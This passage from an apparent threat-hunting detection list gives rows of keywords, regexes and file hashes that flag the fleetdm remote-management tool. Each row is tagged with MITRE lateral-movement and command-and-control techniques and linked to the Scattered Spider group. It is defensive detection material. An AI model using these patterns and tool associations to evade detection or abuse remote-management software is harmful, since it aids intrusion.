Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*/tmp/fleet_remove_log.txt*",".{0,1000}\/tmp\/fleet_remove_log\.txt.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*:9001/proxy/mdmserver1/account*",".{0,1000}\:9001\/proxy\/mdmserver1\/account.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 
Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*\\.\pipe\orbit-osquery-extension*",".{0,1000}\\\\\.\\pipe\\orbit\-osquery\-extension.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#namedpipe","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*>FleetDeck Inc<*",".{0,1000}\>FleetDeck\sInc\<.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#companyname","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*00b377900f7213590db683ce75b4d3ae6053633a5938148afeefd607d0e88319*",".{0,1000}00b377900f7213590db683ce75b4d3ae6053633a5938148afeefd607d0e88319.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*017439a15b04aafd322811f9812262e02f5f0bdf2aa252d46a06d7d118dd24f4*",".{0,1000}017439a15b04aafd322811f9812262e02f5f0bdf2aa252d46a06d7d118dd24f4.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*0237e84c1a958e0c3bd52228ed33aad0e847d5e72a679381ade503ce1dfddc8b*",".{0,1000}0237e84c1a958e0c3bd52228ed33aad0e847d5e72a679381ade503ce1dfddc8b.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*026fd2dd800e84250a19978fc4df8d1c2ff01b61cafdc0aeeb205efb9259fd73*",".{0,1000}026fd2dd800e84250a19978fc4df8d1c2ff01b61cafdc0aeeb205efb9259fd73.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*035a602153cd10af0c370d9863749b006a2590a7c274bb1cb698016a98ccab3f*",".{0,1000}035a602153cd10af0c370d9863749b006a2590a7c274bb1cb698016a98ccab3f.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*03b2d5858587fcf2c5d6f7cdc4a4401318ee63066f936e295f9e94e8c66f0a86*",".{0,1000}03b2d5858587fcf2c5d6f7cdc4a4401318ee63066f936e295f9e94e8c66f0a86.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*045ccab12ac435e6f5a85a15f8109d168193a8370c3a234befa0e960ba609ffa*",".{0,1000}045ccab12ac435e6f5a85a15f8109d168193a8370c3a234befa0e960ba609ffa.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" 
"*069a56ca99f366c294536ade1d99de76e68aac6450bdb5f8b59258295bb1ff22*",".{0,1000}069a56ca99f366c294536ade1d99de76e68aac6450bdb5f8b59258295bb1ff22.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*07ae98d2c32434b5ae6382cf43dda0e42ece5e6788be97f07f6262e9b72cb3a8*",".{0,1000}07ae98d2c32434b5ae6382cf43dda0e42ece5e6788be97f07f6262e9b72cb3a8.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*07e837c2ad8be50c19a464a4db64a912acf2e5d5531fdbfe2c4ac5ac008c83ab*",".{0,1000}07e837c2ad8be50c19a464a4db64a912acf2e5d5531fdbfe2c4ac5ac008c83ab.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*0a80748ee061b0dc3fef0ecf95abcdcf6554fb09e2f3675fa8f48c43d5582dfa*",".{0,1000}0a80748ee061b0dc3fef0ecf95abcdcf6554fb09e2f3675fa8f48c43d5582dfa.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*0b860218a265d58208a132a83dcf04780635337c722caa05cbbd281b32749a91*",".{0,1000}0b860218a265d58208a132a83dcf04780635337c722caa05cbbd281b32749a91.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*0bec3d7403f9a089a30003eb12d000cfac25e12e826055d87dd111f3e7bb8559*",".{0,1000}0bec3d7403f9a089a30003eb12d000cfac25e12e826055d87dd111f3e7bb8559.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*0c4413aa7e74903ba6c00cd78d60bb9a153d5775949a90d2c794ec00cef7fbd8*",".{0,1000}0c4413aa7e74903ba6c00cd78d60bb9a153d5775949a90d2c794ec00cef7fbd8.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*0cbf3ed058d43997b5b034e7c60de64b16ef94a3578358eaf0b4b4a9e6777446*",".{0,1000}0cbf3ed058d43997b5b034e7c60de64b16ef94a3578358eaf0b4b4a9e6777446.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*0ce68a99407f300b71cebe379dfa81096726595934a8dcd45360f84dc6c08163*",".{0,1000}0ce68a99407f300b71cebe379dfa81096726595934a8dcd45360f84dc6c08163.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" 
"*0cfb5b4de55c4affbc5df2d949015300f554d0eca7bb925a79db14997d5c18e2*",".{0,1000}0cfb5b4de55c4affbc5df2d949015300f554d0eca7bb925a79db14997d5c18e2.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*0d34f8d272ad4e604c2798ad670d2a2b06d397cc38fa3d84382a16d014c43925*",".{0,1000}0d34f8d272ad4e604c2798ad670d2a2b06d397cc38fa3d84382a16d014c43925.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*0f7e030eec92ad940dbdafa3806a0140d7589219d7de05301e8cf622e63683df*",".{0,1000}0f7e030eec92ad940dbdafa3806a0140d7589219d7de05301e8cf622e63683df.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*0fdf8c16ffc44fe0006ac5e07721c17a7995c0bcdb4309d3d66697a8f153b402*",".{0,1000}0fdf8c16ffc44fe0006ac5e07721c17a7995c0bcdb4309d3d66697a8f153b402.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*0ffa09304c7f2966f94a1acc5848c0adfa1cdf70525ec51f52722af4624572c3*",".{0,1000}0ffa09304c7f2966f94a1acc5848c0adfa1cdf70525ec51f52722af4624572c3.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*1078cdf24990c103ac9a35c7081bfdf4ea6d0d62d6c9b1a5624a6ab9c6fcb07b*",".{0,1000}1078cdf24990c103ac9a35c7081bfdf4ea6d0d62d6c9b1a5624a6ab9c6fcb07b.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*149ca8b9b2f375a73adf0ae4739f7ab0c83477202c5875ef7f3e2716a087d2ee*",".{0,1000}149ca8b9b2f375a73adf0ae4739f7ab0c83477202c5875ef7f3e2716a087d2ee.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*151e41e5d547de46a4557bef41a35790951a7926646c7d35d1ed1ef7f9961964*",".{0,1000}151e41e5d547de46a4557bef41a35790951a7926646c7d35d1ed1ef7f9961964.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*157f7d3b048d686f719fdbfe50ee4bc9676d6443211d13cdf0a49b108f1fd6eb*",".{0,1000}157f7d3b048d686f719fdbfe50ee4bc9676d6443211d13cdf0a49b108f1fd6eb.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" 
"*16813fc81e4ffa28723f54b0d63838e77da5c8e12c13ae73ec949870c440ecfa*",".{0,1000}16813fc81e4ffa28723f54b0d63838e77da5c8e12c13ae73ec949870c440ecfa.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*17419f33715f3074f54f71fdaf6e732a28da9961b7143de67e7d91dd6e885191*",".{0,1000}17419f33715f3074f54f71fdaf6e732a28da9961b7143de67e7d91dd6e885191.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*189d2b311c47271dd6c1bed36d8531cdf20e2f21aff699d1fe6d8e29020bde63*",".{0,1000}189d2b311c47271dd6c1bed36d8531cdf20e2f21aff699d1fe6d8e29020bde63.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*18aced79e1431c887174daad2c6076afbd67034fd5ef72042260feffce27a274*",".{0,1000}18aced79e1431c887174daad2c6076afbd67034fd5ef72042260feffce27a274.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*1a9fb59e84b29362e747cf4191c4100ccfa6c52fd766eedb831a4169923976eb*",".{0,1000}1a9fb59e84b29362e747cf4191c4100ccfa6c52fd766eedb831a4169923976eb.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*1b60f0c6902fde29c56d8ef1df0be1b1ba81320c08aeeae8aa34b2f3698c5cae*",".{0,1000}1b60f0c6902fde29c56d8ef1df0be1b1ba81320c08aeeae8aa34b2f3698c5cae.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*1ba101f6b07b3194b481dfad27f70bfa23e86a822b49e8c6b3138e57f13614c7*",".{0,1000}1ba101f6b07b3194b481dfad27f70bfa23e86a822b49e8c6b3138e57f13614c7.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*1bcbac2e969778df504fbe04dd5bfb1e337c141869efdca9c3974e8c97296e18*",".{0,1000}1bcbac2e969778df504fbe04dd5bfb1e337c141869efdca9c3974e8c97296e18.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*1c28a3ecf4991146bccfd39ec97c8c060286596c44caedb598feaaf607b277cd*",".{0,1000}1c28a3ecf4991146bccfd39ec97c8c060286596c44caedb598feaaf607b277cd.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" 
"*1d289b4fb2f8766a1a1e7f8bab7472322f721c1c2f7ecf676f0c9dadfc7f66b3*",".{0,1000}1d289b4fb2f8766a1a1e7f8bab7472322f721c1c2f7ecf676f0c9dadfc7f66b3.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*1d6101c42021d29583532660865649b7e609b0862e3bd0b164ec794b2953a2f0*",".{0,1000}1d6101c42021d29583532660865649b7e609b0862e3bd0b164ec794b2953a2f0.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*1d7c4f0e2045835904ee9c994212605d67aef12c7899d8d203039100dc038db7*",".{0,1000}1d7c4f0e2045835904ee9c994212605d67aef12c7899d8d203039100dc038db7.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*1e938fb7b547413a088c96ada20ab163fe27f12d2124aa1cb652f68ec0448970*",".{0,1000}1e938fb7b547413a088c96ada20ab163fe27f12d2124aa1cb652f68ec0448970.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*1f615397bacd86a29514e0cc9981af1e76ba261c6634367508a7fd88bc088724*",".{0,1000}1f615397bacd86a29514e0cc9981af1e76ba261c6634367508a7fd88bc088724.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*1f88f58c10b8f936cf8058e5effdef6a88ece05393f3c3df2a1247c3d6e651c0*",".{0,1000}1f88f58c10b8f936cf8058e5effdef6a88ece05393f3c3df2a1247c3d6e651c0.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*1fd8e5fb9a446742894cec59f3007244ed3ea77b2f7401b6fc42333dc0a0ed51*",".{0,1000}1fd8e5fb9a446742894cec59f3007244ed3ea77b2f7401b6fc42333dc0a0ed51.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*221696c07ae07e3e5892f0538003c1ff036a5a1a89e6a2260fe435695214e3b0*",".{0,1000}221696c07ae07e3e5892f0538003c1ff036a5a1a89e6a2260fe435695214e3b0.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*222472878481b038dba079d39e38666a6d49da0fce417645e9439f6385ffaba4*",".{0,1000}222472878481b038dba079d39e38666a6d49da0fce417645e9439f6385ffaba4.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" 
"*2266628a8f1495e4ec904646ee77797367b359aaa3b3a1dd49449031bb5c7878*",".{0,1000}2266628a8f1495e4ec904646ee77797367b359aaa3b3a1dd49449031bb5c7878.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*244b58636bb8104b7b48fbb09402827ad91fd9424a1cb9dc15f8ca353718906d*",".{0,1000}244b58636bb8104b7b48fbb09402827ad91fd9424a1cb9dc15f8ca353718906d.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*2677ada64618dc9d5ac8f15ee9b377009c34376e72c3f460ada6db202821fbef*",".{0,1000}2677ada64618dc9d5ac8f15ee9b377009c34376e72c3f460ada6db202821fbef.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*2699a142ddf7b9f8c30c65c37f4511f6dfb7a8114eab3d4ef026f04a3944fac1*",".{0,1000}2699a142ddf7b9f8c30c65c37f4511f6dfb7a8114eab3d4ef026f04a3944fac1.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*2c775985d8d4e0262216794d6924aea06a6f9ce9888c6918347e3df3886e8579*",".{0,1000}2c775985d8d4e0262216794d6924aea06a6f9ce9888c6918347e3df3886e8579.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*2ce1530925d694ce72da0deda5dc3f7f8ee6b5fe2b3b3ade80973e5b72c35e96*",".{0,1000}2ce1530925d694ce72da0deda5dc3f7f8ee6b5fe2b3b3ade80973e5b72c35e96.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*2e441805f8ad1cd674a7d024936547d4268d9b8be63a7b08445ad6e394974f44*",".{0,1000}2e441805f8ad1cd674a7d024936547d4268d9b8be63a7b08445ad6e394974f44.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*2e8d4bdf96c2294bb242e69f02fb44afcc5b710bb99d45047ee39d8d22f3f025*",".{0,1000}2e8d4bdf96c2294bb242e69f02fb44afcc5b710bb99d45047ee39d8d22f3f025.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*2ec4ee6330d9e05cf8be0e465298e4da33f47e6ab5f93581998dc7ed2837bffd*",".{0,1000}2ec4ee6330d9e05cf8be0e465298e4da33f47e6ab5f93581998dc7ed2837bffd.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" 
"*2f1f3b1b11933cc4f1396967bc588143aaa84313f08cf5aa1c4d009509d4d20d*",".{0,1000}2f1f3b1b11933cc4f1396967bc588143aaa84313f08cf5aa1c4d009509d4d20d.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*2fc0ed12ef82482e5f7afc1fc61e25f43139421f3a999d366ac1a403b33ece3c*",".{0,1000}2fc0ed12ef82482e5f7afc1fc61e25f43139421f3a999d366ac1a403b33ece3c.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*2ff4610933ac3310b66beca9b0f12bb88aa346c5ab8f1cfd4fd03219efbeacc9*",".{0,1000}2ff4610933ac3310b66beca9b0f12bb88aa346c5ab8f1cfd4fd03219efbeacc9.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*3071cf9b377f62becd8f5ede7a3370eb94499fe28e87a6f6a4be6f6df3c0ac12*",".{0,1000}3071cf9b377f62becd8f5ede7a3370eb94499fe28e87a6f6a4be6f6df3c0ac12.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*3212ec3f0ece0d3d4df29f816f2928ca98398c57f110f3e18dbbb656ff56f073*",".{0,1000}3212ec3f0ece0d3d4df29f816f2928ca98398c57f110f3e18dbbb656ff56f073.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - 
